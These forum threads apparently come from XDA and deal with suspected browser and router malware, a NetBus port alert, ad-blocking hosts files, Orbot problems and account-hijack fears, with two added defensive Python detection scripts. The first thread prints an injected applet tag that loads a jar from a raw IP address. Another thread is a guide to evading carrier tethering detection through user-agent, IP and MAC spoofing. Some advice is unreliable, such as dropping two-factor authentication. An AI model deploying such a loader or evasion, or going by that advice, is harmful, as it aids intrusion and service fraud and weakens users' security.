New internet virus - very dangerous - General Questions and Answers

My Firefox suddenly started opening a popup asking what to do with a "frame.html" file from http://188.126.79.73
After opening the frame.html file, here is its source:
Code:
<applet width='10' name='Adobe Flash Player Update' height='11' code='FlashPlayer.class' archive='http://188.126.79.73/FlashPlayer.jar'>
I believe this is a virus. EVERY Firefox tab I have open produces one of those popups asking if I want to open with or save the frame.html file. If I refresh a tab it produces a new popup of the same type. This is a bad virus, really bad. I don't have any clues on how to stop it from harassing my Firefox. It seems to use some ICAP stuff to blow every Firefox tab. I need some help here.

I'd reinstall Firefox and Flash before jumping to any conclusions. It may just be a bug. You could try running a couple of scans to be on the safe side. Malwarebytes and HijackThis will find anything nasty.

Already did that. The website which it's redirecting to download that "update" is not from Adobe, so it's a virus... I just don't know how to clean it because it has infected all my Firefox.

fscussel said:
Already did that. The website which it's redirecting to download that "update" is not from Adobe, so it's a virus... I just don't know how to clean it because it has infected all my Firefox.
Hello. Have you tried to uninstall and reinstall ff? yes you probably have...
Have you tried a restore point?
IMO, humbly, if it's as bad as you may think, and no scans are finding it, then you may have to go through your RegKeys and google them to locate anything uncommon.
I hope you're wrong about it altogether though!
good luck

chrisnk1 said:
Hello. Have you tried to uninstall and reinstall ff? yes you probably have...
Have you tried a restore point?
IMO, humbly, if it's as bad as you may think, and no scans are finding it, then you may have to go through your RegKeys and google them to locate anything uncommon.
I hope you're wrong about it altogether though!
good luck
No, I'm not wrong. I have AVIRA antivirus always on and updated, I've tried that malware software which was suggested, both don't find anything, but now I just tried to access my router setup and I can't!!!! It says timeout, which is impossible. So what I have found out is that this virus put a layer between Firefox and the web address, like a proxy or something, probably some stuff called ICAP which I don't know what it is... and I don't know how to remove. All my addresses are being redirected... I get the webpage loaded but with this damn window "applet.html" which is the virus...

idk if you speak about phone or pc..
this will for sure work on pc, ,idk about phone..
find combofix from google..
it is free
be careful about the name as there are counterfeits
it will fix browser probs where MWB and everything else I've ever seen fail..

After resetting my router everything went back to normal. Is there any virus which infects a router?

B4 doing something potentially damaging to a system...
Do a whois for that ip address. You will see that this ip address is a vpn service. Which means redirects are expected. Now did you install or configure any vpn recently? Try to disable it and see if you still get the popups. relax mate.
Sent from my HTC Desire HD using Tapatalk

lordskid said:
B4 doing something potentially damaging to a system...
Do a whois for that ip address. You will see that this ip address is a vpn service. Which means redirects are expected. Now did you install or configure any vpn recently? Try to disable it and see if you still get the popups. relax mate.
Sent from my HTC Desire HD using Tapatalk
If it was a VPN problem it would only happen on my PC, but it was happening on every PC in the house. After rebooting the router the problem was solved, so I can only assume that my router was compromised.
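
The tag posted at the start of this thread is the kind of markup that appears when something on the network path rewrites plain-HTTP pages for every machine behind it. As an added example, not code from any poster in the thread, this Python script flags active-content tags that load from a raw IP address or from a host other than the page's own; the sample page and the names `forum.example.org` and `cdn.example.net` are constructed, and only the applet line is taken from the first post.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import ipaddress

# Tags that pull in active content, and the attributes that carry the URL.
ACTIVE_TAGS = {
    "applet": ("archive", "codebase"),
    "object": ("data", "codebase"),
    "embed": ("src",),
    "iframe": ("src",),
    "frame": ("src",),
    "script": ("src",),
}

# Constructed page body; the <applet> line is the one quoted in the thread.
SAMPLE_PAGE = """
<html><head>
<script src="/js/site.js"></script>
<script src="http://cdn.example.net/lib.js"></script>
</head><body>
<p>Forum index</p>
<applet width='10' name='Adobe Flash Player Update' height='11' code='FlashPlayer.class' archive='http://188.126.79.73/FlashPlayer.jar'>
</body></html>
"""


def is_ip_literal(host):
    """True when the host part of a URL is an IPv4/IPv6 address, not a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


class InjectionFinder(HTMLParser):
    """Collects (tag, attribute, host, reason) for off-host active content."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ACTIVE_TAGS:
            return
        attr_map = dict(attrs)
        for name in ACTIVE_TAGS[tag]:
            url = attr_map.get(name)
            if not url:
                continue
            host = urlparse(url).hostname
            if host is None or host == self.page_host:
                continue  # relative URL or same host as the page
            reason = "ip-literal host" if is_ip_literal(host) else "third-party host"
            self.findings.append((tag, name, host, reason))


def find_offhost_content(html, page_host):
    """Every active-content reference that leaves the page's own host."""
    finder = InjectionFinder(page_host)
    finder.feed(html)
    return finder.findings


def ip_literal_findings(html, page_host):
    """The subset worth looking at first: content served from a bare IP."""
    return [f for f in find_offhost_content(html, page_host)
            if f[3] == "ip-literal host"]


if __name__ == "__main__":
    for finding in find_offhost_content(SAMPLE_PAGE, "forum.example.org"):
        print(finding)
```

Seeing the same IP-literal finding on unrelated sites and on every machine behind one router, as the posters did, points at the shared network path rather than a single browser.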


How do i turn off the stupid commercials?

I just recently totally reformatted my hard drive because I thought I had a virus and couldn't find it. But after reinstalling everything and making sure that I didn't have anything I discovered that when I log into XDA and I stay on for some length of time all of a sudden I start getting commercials playing. How do I stop these?
TDubKong said:
I just recently totally reformatted my hard drive because I thought I had a virus and couldn't find it. But after reinstalling everything and making sure that I didn't have anything I discovered that when I log into XDA and I stay on for some length of time all of a sudden I start getting commercials playing. How do I stop these?
Huh, I don't know what you are referring to. Screen shot perhaps? I assume whatever it is, it depends on flash and the easiest way is to disable flash. The browser I use lets you disable it per site or only enable when you click. I assume other browsers have something as an extension.
yareally said:
Huh, I don't know what you are referring to. Screen shot perhaps? I assume whatever it is, it depends on flash and the easiest way is to disable flash. The browser I use lets you disable it per site or only enable when you click. I assume other browsers have something as an extension.
I dunno. I never have it happen on any other site. This is the only one. I don't see any ads. It's just audio. I've hunted it down and hunted it down but haven't found where it is on here.
TDubKong said:
I dunno. I never have it happen on any other site. This is the only one. I don't see any ads. It's just audio. I've hunted it down and hunted it down but haven't found where it is on here.
Weird. If you get something like firebug or http headers extensions on firefox, they will let you find out what external links are loading. If you can get me some sort of dump or screen shot, I can tell you what to block in your host file. Chrome has the developers tools that show the same stuff or Opera has Dragonfly, so whichever you use.
Opera though, you can right click on the page → content tab → edit site preferences → turn off plugins. That's what I do at least or disable them on all sites and enable when I need them, just for better security.
Pretty sure the other browsers have flashblock, but last I knew and don't quote me on it, flashblock runs the flash just for a moment before it shuts off the flash since it's an extension. If the flash happened to be malicious, that could possibly be bad. Just semi off topic, but just something that was true and may still be.
If you don't want to deal with all that, you can use my hosts file that I use on my desktop, it's a smaller version of the one I use for mobile that's posted with a script to install/update it in the developer's section of the forum.
http://dl.dropbox.com/u/24904191/hosts-desktop
Rename it "hosts" and stick it in C:\Windows\System32\drivers\etc\hosts on Windows (must open Notepad with admin privileges) or on Linux/OSX, it goes in /etc/hosts.
I wouldn't normally advocate for blocking ads on xda, but if they have anything that automatically plays audio, that draws the line for me.
TDubKong said:
I dunno. I never have it happen on any other site. This is the only one. I don't see any ads. It's just audio. I've hunted it down and hunted it down but haven't found where it is on here.
Scroll all the way to the bottom of the page you're on, it's on the right side.
Sent from my 5am5ung SGH-R225
It's just a blank white space for me, but if you add the following line to your host file, you won't see it anymore, since it's one of these:
0.0.0.0 rt.liftdna.com track.netshelter.net cdn.viglink.com
http://forum.xda-developers.com/showthread.php?t=1264778
Will flag again to the admin.

12346 Netbus Backdoor trojan showing up on my girlfriend's phone.

So I did a search and couldn't really find any info on what this is. Today I was scanning everything attached to my network with Fing and her phone came up with a TCP 12346 netbus backdoor trojan. Not sure where to go from here to find and remove it. My guess is she got it from using mp3 music downloader. Any help is much appreciated.
Anyone????
What did you use to scan it with?
Sent from my ADR6400L using Tapatalk
Turd Furguson said:
What did you use to scan it with?
Sent from my ADR6400L using Tapatalk
look out security
Android NetBus backdoor trojan
Bump. I have seen this "12346 NetBus backdoor trojan" during a fing (overlooksoft) service scan. What does xda have to say about this?
Wikipedia gives an interesting article about the NetBus trojan horse.
The person that owns the phone claims that they clicked on a link in an email and the phone froze.
The only solution I have dug up is a factory reset. I did, ran another scan and it didn't change.
I'll be looking for feedback!
same 12346 netbus back Door trojan
Fing app tells me that my Phone has 12346 port open. Any advice? Thanks
For anyone still wondering
I also used Fing and found the same open port, and it seems if you use the Rhapsody service then that is your answer; if you don't then go fish. Best of luck, hope this helps . . . . at least to anyone that uses Rhapsody
I also have Rhapsody/Napster and I also did a scan with the Fing app, and got the same Netbus backdoor trojan in the running services when scanning with Fing. This is totally a guess but if it's Napster then it would make sense that the app keeps a port open so it can block the service if your subscription is canceled or suspended. My experience is that if you force Napster into offline mode before it's cancelled or suspended it won't block the service because it's not actively searching for the network. I have done this with Napster a few times.
Install TWRP and reformat the drive... then re-flash the stock firmware.
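
A scanner's "NetBus" label is looked up from the port number, so the useful question is which app on the phone actually holds port 12346, as the Rhapsody/Napster posters worked out by elimination. As an added example (not from any poster in the thread), this Python script reads a `/proc/net/tcp` table and reports the owning UID and app for a listening port; the table contents, the UID-to-package map and the package name `com.example.musicplayer` are constructed, and capturing the table from a root shell on the phone is an assumption.

```python
import socket
import struct

TCP_LISTEN = "0A"  # state code the kernel prints for a listening socket

# Constructed sample of /proc/net/tcp (IPv4 sockets only; tcp6 has a wider
# address field and is not handled here). Addresses and ports are hex.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:303A 00000000:0000 0A 00000000:00000000 00:00000000 00000000 10123        0 41234 1 0000000000000000 100 0 0 10 0
   1: 0100007F:13AD 00000000:0000 0A 00000000:00000000 00:00000000 00000000  2000        0 40011 1 0000000000000000 100 0 0 10 0
   2: 0A01A8C0:B3D2 5DB8D822:01BB 01 00000000:00000000 00:00000000 00000000 10123        0 41300 1 0000000000000000 20 4 30 10 -1
"""

# Constructed UID-to-package map; on a real phone this comes from the
# package manager. The package name is hypothetical.
SAMPLE_UID_TO_PACKAGE = {10123: "com.example.musicplayer"}


def decode_ipv4(hex_addr):
    """Turn the kernel's hex address into dotted form.

    The kernel prints the 32-bit address as a host-order integer, so on a
    little-endian device (ARM and x86 phones) the bytes appear reversed.
    """
    return socket.inet_ntoa(struct.pack("<I", int(hex_addr, 16)))


def parse_listeners(proc_net_tcp):
    """Return one dict per socket in LISTEN state."""
    listeners = []
    for line in proc_net_tcp.splitlines()[1:]:  # first line is the header
        fields = line.split()
        if len(fields) < 8 or fields[3] != TCP_LISTEN:
            continue
        ip_hex, port_hex = fields[1].split(":")
        listeners.append({
            "ip": decode_ipv4(ip_hex),
            "port": int(port_hex, 16),
            "uid": int(fields[7]),
        })
    return listeners


def owner_of_port(proc_net_tcp, port, uid_to_package):
    """Who listens on `port`, and is it reachable from the network?"""
    results = []
    for entry in parse_listeners(proc_net_tcp):
        if entry["port"] != port:
            continue
        results.append({
            **entry,
            "package": uid_to_package.get(entry["uid"]),  # None if unmapped
            "all_interfaces": entry["ip"] == "0.0.0.0",
        })
    return results


if __name__ == "__main__":
    for hit in owner_of_port(SAMPLE_PROC_NET_TCP, 12346, SAMPLE_UID_TO_PACKAGE):
        print(hit)
```

A listener bound to `0.0.0.0` is reachable from the Wi-Fi network, which is why a LAN scan sees it; one bound to `127.0.0.1` would not show up in such a scan.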

[GUIDE] How to bypass T-Mobile's tether block using Firefox

Hello everyone, so I recently finally got blocked from tethering by T-Mobile after a long time of sucking it out of them by being rooted and on a custom ROM like all of us here.
The way they know you are tethering on their network is by the User Agent that is sent to them by your desktop/laptop computer browser. When they see that a regular browser is accessing their network, that's when you get the infamous T-Mobile Hotspot Screen we all hate.
I've recently discovered a Firefox Add-On called User Agent Switcher found here: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/?src=search
Download it and install it to Firefox. Then download this (right click, "Save as") http://techpatterns.com/downloads/firefox/useragentswitcher.xml
Go to Tools>User Agent>Edit User Agents (a window pops up) click on "Import.." and add the .xml file you just downloaded.
Then pick a User Agent that resembles the Sensation webkit and BAM! Free tethering for all of us.
I'm using it right now
NOTE: If you use a Googlebot User Agent, you will be able to tether and always load up full webpages instead of mobile versions. - Thanks to The Archangel and chadwick3nser for discovering this!
You can also do the same with chrome.
Been doing it since the day they released it.
The Archangel said:
You can also do the same with chrome.
Been doing it since the day they released it.
Hell yeah, go Chrome! I've never used it so I wouldn't know
FiddleGoose said:
Hell yeah, go Chrome! I've never used it so I wouldn't know
I actually take it one step further and either completely hide my IP on the computer or switch it so they can't try to block it.
Nice!
Is that how att detects also?
Sent from my SAMSUNG-SGH-I747 using xda premium
They detect by sniffing packets and the extra MAC address
The Archangel said:
They detect by sniffing packets and the extra MAC address
Damn, AT&T is on point. Bastards.
I hate T-Mobile for pulling that move as well.
FiddleGoose said:
Damn, AT&T is on point. Bastards.
I hate T-Mobile for pulling that move as well.
just about every major cell company does the exact same thing to detect it. Maybe different variants but still the same.
I am doing this right now as well, but all the desktop pages are in mobile. I have found the desktop button on the bottom of the YouTube site but can't find it on most sites. Any workaround for this?
chadwick3nser said:
I am doing this right now as well, but all the desktop pages are in mobile. I have found the desktop button on the bottom of the YouTube site but can't find it on most sites. Any workaround for this?
Use a Google spider UA. Everything will be as normal
The Archangel said:
Use a Google spider UA. Everything will be as normal
Do I create a custom UA and edit the string to a spider, or how would be the best way? Or what would be the best one to use, about going about this? Sorry, have no experience with user agents
---------- Post added at 05:54 PM ---------- Previous post was at 05:43 PM ----------
Never mind, I used googlebot 2.1 new version and it's working great, thanks for this!!!
Glad you got it working.
Hey OP. Here's a suggestion, put in your first post: use a Google bot user agent. Using that will load all the web mail pages normally.
The Archangel said:
Glad you got it working.
Hey OP. Here's a suggestion, put in your first post: use a Google bot user agent. Using that will load all the web mail pages normally.
You got it!
The Archangel said:
I actually take it one step further and either completely hide my IP on the computer or switch it so they can't try to block it.
What are you using to block the IP address? I was thinking just changing the IP to not be the standard DHCP that the phone would give you still shows it coming from another MAC address on the same connection and would be obvious to the write sniffing rules?
I realize this isn't a requirement I've been using the UA for a while from canary but I easily see them stopping this workaround w/ better sniffing rules.
SurfCityCom said:
What are you using to block the IP address? I was thinking just changing the IP to not be the standard DHCP that the phone would give you still shows it coming from another MAC address on the same connection and would be obvious to the write sniffing rules?
I realize this isn't a requirement I've been using the UA for a while from canary but I easily see them stopping this workaround w/ better sniffing rules.
I use Platinum Hide IP. It switches to another IP when I'm on Windows and sometimes I'll use SMAC to change that also. Haven't found any programs for Linux yet (haven't really looked)
The Archangel said:
Use a Google spider UA. Everything will be as normal
This is very bad advice, as pretending to be a googlebot may get you either blocked or banned from many websites (especially if they use ZBBlock) as this behavior is rated as a spammer/bot activity.
tobitege said:
This is very bad advice, as pretending to be a googlebot may get you either blocked or banned from many websites (especially if they use ZBBlock) as this behavior is rated as a spammer/bot activity.
I've been doing it for a while, never got a ban on my end
Okay I've been tethering fine for a while on FF, but T-Mobile finally blocked me yesterday... I figured out that it was the second I started to watch a YouTube video. Guessing they're able to see activity on my cell account at the same time as my login is accessing YouTube and put 2&2 together...? (That may be obvious to some...)
Anyway... I may try the user agent spoofing but this is really aggravating since I'm traveling right now and the internets in my hotel are $10/day.
Sent from my Galaxy S 4G
Anyone figure out how to use netflix while spoofing in Firefox? I've been settling for Amazon Prime instant video, but I'd love to have Netflix back. With the UA spoof, Netflix won't play movies. At least I haven't figured out how.
This method no longer works for me

Orbot problem... connects to Tor but no onions..

I start Orbot to log onto the Tor network.. It logs me onto the Tor network, but it refuses to resolve any .onions. Same thing is happening on my Nexus 7... I'm using cw11 nightly... I know I'm on Tor because I check to see what my IP is...... but getting to the deep web I get an error:
WARN: Resolve requests to hidden services not allowed.
Failing
Every other site can work... Did I screw up a hosts file or something?
Any help would be appreciated. Thank you
Just want to say I have the exact same problem. Not with Firefox, not with Orbot, I can connect to Tor fine (check.torproject.org says I'm connected), but I can't open any .onion site. It says "name not resolved", or something...
Sent from my Galaxy W using Tapatalk
andrepd said:
Just want to say I have the exact same problem. Not with Firefox, not with Orbot, I can connect to Tor fine (check.torproject.org says I'm connected), but I can't open any .onion site. It says "name not resolved", or something...
Sent from my Galaxy W using Tapatalk
Soo.... no one else has been having issues?
I know this is a bit older post but the problem is still there. I have the same problem with my Android 5.0.2 (Lollipop) phone and Orbot. If I check the IP it's a Tor IP. I can reach all normal sites but no onion sites. I searched and searched and tested all kinds of Firefox settings suggested but no go. What is going on? Because of this I can't trust Orbot. Not that I'm planning to do illegal stuff, I just want to explore stuff, but if people really need a safe way to go online I wouldn't trust my life on Orbot.
5lut said:
I start Orbot to log onto the Tor network.. It logs me onto the Tor network, but it refuses to resolve any .onions. Same thing is happening on my Nexus 7... I'm using cw11 nightly... I know I'm on Tor because I check to see what my IP is...... but getting to the deep web I get an error:
WARN: Resolve requests to hidden services not allowed.
Failing
Every other site can work... Did I screw up a hosts file or something?
Any help would be appreciated. Thank you
Are you sure the onion sites are up, and you are typing the url correctly?
delete this

Every time I install a new rom or do a factory reset it looks like I've been hacked

As the title says, every time I install a new ROM or do a factory reset it looks like I've been hacked. As soon as I register and connect my phone to the internet, Google security activity shows that my phone has been connected from Ireland or Germany although I'm connecting from Sweden. How can this be explained if I'm not being hacked? I take all the security measures, changing password etc... But yet this problem doesn't go away. Does this happen to anyone else?
give us more detail
did it happen only with one device or more? what do u use for root, which rom, custom recovery do u install? which kind of gapps do u use? does it happen just when u install the rom/recovery, or when u set up the gapps?
the foreign connection message is inside the gmail account? do u see foreign ip address logged when u are not logged or just foreign ip when u are logged? (this question is because maybe something use a vpn)
I use Viperone ROM, but it doesn't matter what ROM I use. As soon as I log in to my Google account it happens. On the Google security activity where I can see my devices, it shows that I logged in from Ireland or Germany, and after that it goes back to show that I logged in from Sweden. So far I noticed that it only happens on my phone, but in the past it used to happen on my PC too, and it does not show the IP address, it only shows the name of the country. This is how it looks: http://imgur.com/2A9ZBJy Tyskland is Germany in Swedish and it's not supposed to be there with Ireland.
Keomas said:
I use Viperone ROM, but it doesn't matter what ROM I use. As soon as I log in to my Google account it happens. On the Google security activity where I can see my devices, it shows that I logged in from Ireland or Germany, and after that it goes back to show that I logged in from Sweden. So far I noticed that it only happens on my phone, but in the past it used to happen on my PC too, and it does not show the IP address, it only shows the name of the country. This is how it looks: http://imgur.com/2A9ZBJy Tyskland is Germany in Swedish and it's not supposed to be there with Ireland.
when u install rom and configure gapps r u using your wifi? because is strange it happens also with your pc, maybe the problem is in your LAN, it happens just after the gapps setup after a fresh install or also later?
do u use official gapps (and where is the source) or do u use other kind of gapps?
The ROMs that I use already have Google apps installed. This time it happened right after I logged in to my phone. In the past it happened a day later.
It's possible that the new ROM had its location history set to those locations.. And Google apps like a good little app is telling where you are...
But it's wrong until it gets a proper location update.
nutpants said:
It's possible that the new ROM had its location history set to those locations.. And Google apps like a good little app is telling where you are...
But it's wrong until it gets a proper location update.
No. This happens when I change the password. I changed the password before I installed the new ROM.
Google
Yeah sure. Google needs update location.
sichuv11 said:
Yeah sure. Google needs update location.
Nope. I'm definitely being hacked. Everything points towards it. I change my password I format my PC I install the original android to my phone, same **** happens. It was not like this before.
There is a trojan that can not be found by virus, malware and trojan software. This bastard got me. I think it could be the government.
Now it looks like this, I got USA instead of Germany http://imgur.com/uYDxZ1j Am I being hacked or not? 6th February is the day I changed my password, compare it with the first picture I posted.
make 2 new Google accounts with your PC
wipe your phone and install a ROM, then configure it with one new account
use it for a day
then with your PC go in both accounts and see if both are compromised or not
Let's assume the worst thing, that I am being hacked. How can I stop this from happening? I already changed password (I'm doing that from time to time), I use 2 step verification and sms verification when I login to my Gmail and I got virus, malware and firewall softwares, what else can I do? How am I being hacked?
Keomas said:
Let's assume the worst thing, that I am being hacked. How can I stop this from happening? I already changed password (I'm doing that from time to time), I use 2 step verification and sms verification when I login to my Gmail and I got virus, malware and firewall softwares, what else can I do? How am I being hacked?
if u want help you should try to do what we say and report it
niubboxp said:
if u want help you should try to do what we say and report it
You're just asking questions, I don't think you have answers.
Keomas said:
You're just asking questions, I don't think you have answers.
and you will never know
niubboxp said:
and you will never know
Maybe not on this forum, but there are other forums.
What rom are you using? Where did you get it?
What email app are you using?
Who is your internet provider for your device?
All of these can be factors in you being hacked...
Your ROM could have a Trojan on it.
Your email could be not properly storing your password.
(You're not using the factory email app that uses the account you're signed into your phone with, are you? Please say no)
Is your internet provider known for making a federal case out of every request for information or do they give it out to anyone with a badge?
More information is needed before you can be helped.
First off change roms...
If you are using an OEM ROM get a custom ROM from a popular developer.
Then change email providers
(Unless you are taking Google)
Then dump the two factor crap
Get a third party open source email app or use tor to sign in by web mail.
Change and set your password from a cafe or hotel Wi-Fi that is nowhere where you usually go.
Then see if you think you are being hacked..
If so trash the phone
Get a new one with cash..
Root it secure it
Try again
And if that still looks bad..
Use paper and one time pads for encryption and safe drop points.
